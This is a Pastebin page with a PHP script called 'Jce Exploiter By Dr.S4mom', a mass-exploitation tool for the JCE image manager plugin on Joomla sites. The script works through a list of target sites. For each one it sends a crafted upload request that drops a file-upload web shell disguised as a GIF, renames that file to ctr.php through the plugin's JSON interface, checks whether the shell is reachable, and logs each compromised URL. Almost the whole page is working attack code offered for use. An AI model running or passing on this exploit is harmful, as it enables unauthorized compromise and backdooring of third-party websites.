API tools faq
paste
S4mom

Jce Exploiter By Dr.S4mom

S4mom
Jan 29th, 2017
1,624
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.01 KB | None | 0 0
raw download clone embed print report
  1. <?php  
  2.         echo "
  3.  _____      _            _______                   _____          
  4. / ____|    | |          |__   __|                 |  __ \          
  5. | |    _   _| |__   ___ _ __| | ___  __ _ _ __ ___ | |__) |_____  __
  6. | |   | | | | '_ \ / _ \ '__| |/ _ \/ _` | '_ ` _ \|  _  // _ \ \/ /
  7. | |___| |_| | |_) |  __/ |  | |  __/ (_| | | | | | | | \ \ (_) >  <
  8. \_____\__, |_.__/ \___|_|  |_|\___|\__,_|_| |_| |_|_|  \_\___/_/\_\
  9.        __/ |                                                      
  10.       |___/                                                        
  11.  
  12. Jce Upload shell Exploiter Coded By Dr.S4mom
  13.  
  14.  
  15.         \n";
  16.        
  17.  
  18. set_time_limit (0);
  19.  
  20. //this is our uploader, you can change it, if you whant
  21. $up = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
  22.  
  23. //upload directory, you can change it if the directory is not writable
  24. $dir = "/";
  25.  
  26. if (!isset ($argv[1]))
  27.         die ("\nUsage : php {$argv[0]} list.txt\n");
  28.  
  29. if (!file_exists ($argv[1]))
  30.         die ("\n\"{$argv[1]}\" File Not Found !\n");
  31.  
  32. $site = file ($argv[1]);
  33.  
  34.  
  35. $file = fopen ("rslt.txt", "a");
  36. $name = "ctr.php";
  37.  
  38. foreach ($site as $sites)
  39. {
  40.         $sites = trim ($sites);
  41.         jce_upload ($sites, "by Dr.S4mom<br><br>".$up, $dir, $name); //upload as dz.gif & rename to .php
  42.  
  43.         // check if uploaded & renamed :)
  44.         if (preg_match ("/Dr.S4mom/i", @file_get_contents ("$sites/images/stories/$name")))
  45.         {
  46.                 echo "Done -> $sites/images/stories/$name\n";
  47.                 fwrite ($file, "$sites/images/stories/$name\n");
  48.         }
  49.         elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/images/$name")))
  50.         {
  51.                 echo "Done -> $site/images/$name\n";
  52.                 fwrite ($file, "$sites/images/$name\n");
  53.         }
  54.         elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/$name")))
  55.         {
  56.                 echo "Done -> $site/$name\n";
  57.                 fwrite ($file, "$sites/$name\n");
  58.         }
  59.         else
  60.                 echo "Not Vuln -> $sites\n";
  61. }
  62.  
  63. fclose ($file);
  64.  
  65. function jce_upload ($site, $content, $up_dir, $rename)
  66. {
  67.         $host = parse_url ($site, PHP_URL_HOST);
  68.         $path = parse_url ($site, PHP_URL_PATH);
  69.  
  70.         if (!$path)
  71.                 $path = "/";
  72.  
  73.         $name = "dz.gif";
  74.  
  75.         $data    = "-----------------------------41184676334\r\n";
  76.         $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
  77.         $data   .= "$up_dir\r\n";
  78.         $data   .= "-----------------------------41184676334\r\n";
  79.         $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
  80.         $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
  81.         $data   .= "-----------------------------41184676334\r\n";
  82.         $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
  83.         $data   .= "1\r\n";
  84.         $data   .= "-----------------------------41184676334\r\n";
  85.         $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"$name\"\r\n";
  86.         $data   .= "Content-Type: image/gif\r\n\r\n";
  87.         $data   .= "$content\r\n";
  88.         $data   .= "-----------------------------41184676334\r\n";
  89.         $data   .= "0\r\n";
  90.         $data   .= "-----------------------------41184676334\r\n";
  91.         $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
  92.         $data   .= "upload\r\n";
  93.         $data   .= "-----------------------------41184676334--";
  94.  
  95.         $packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.0\r\n";
  96.         $packet .= "Host: $host\r\n";
  97.         $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
  98.         $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
  99.         $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  100.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  101.         $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
  102.         $packet .= "Accept-Encoding: deflate\n";
  103.         $packet .= "Connection: Close\r\n";
  104.         $packet .= "Proxy-Connection: close\r\n";
  105.         $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
  106.         $packet .= $data;
  107.         $packet .= "\r\n";
  108.  
  109.         send ($host, $packet);
  110.        
  111.         //folderRename
  112.         //fileRename
  113.         //fileCopy
  114.         $data = "json={\"fn\":\"folderRename\",\"args\":[\"$up_dir".$name."\",\"$rename\"]}";
  115.        
  116.         $packet  = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw HTTP/1.0\r\n";
  117.         $packet .= "Host: $host\r\n";
  118.         $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
  119.         $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  120.         $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
  121.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  122.         $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
  123.         $packet .= "Accept-Encoding: deflate\n";
  124.         $packet .= "X-Request: JSON\r\n";
  125.         $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n";
  126.         $packet .= $data."\r\n\r\n";
  127.        
  128.         send ($host, $packet);
  129. }
  130.  
  131. function send ($host, $packet)
  132. {
  133.         if ($connect = @fsockopen ($host, 80, $x, $y, 3))
  134.         {
  135.                 @fputs ($connect, $packet);
  136.                 @fclose ($connect);
  137.         }
  138. }
  139.  
  140. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!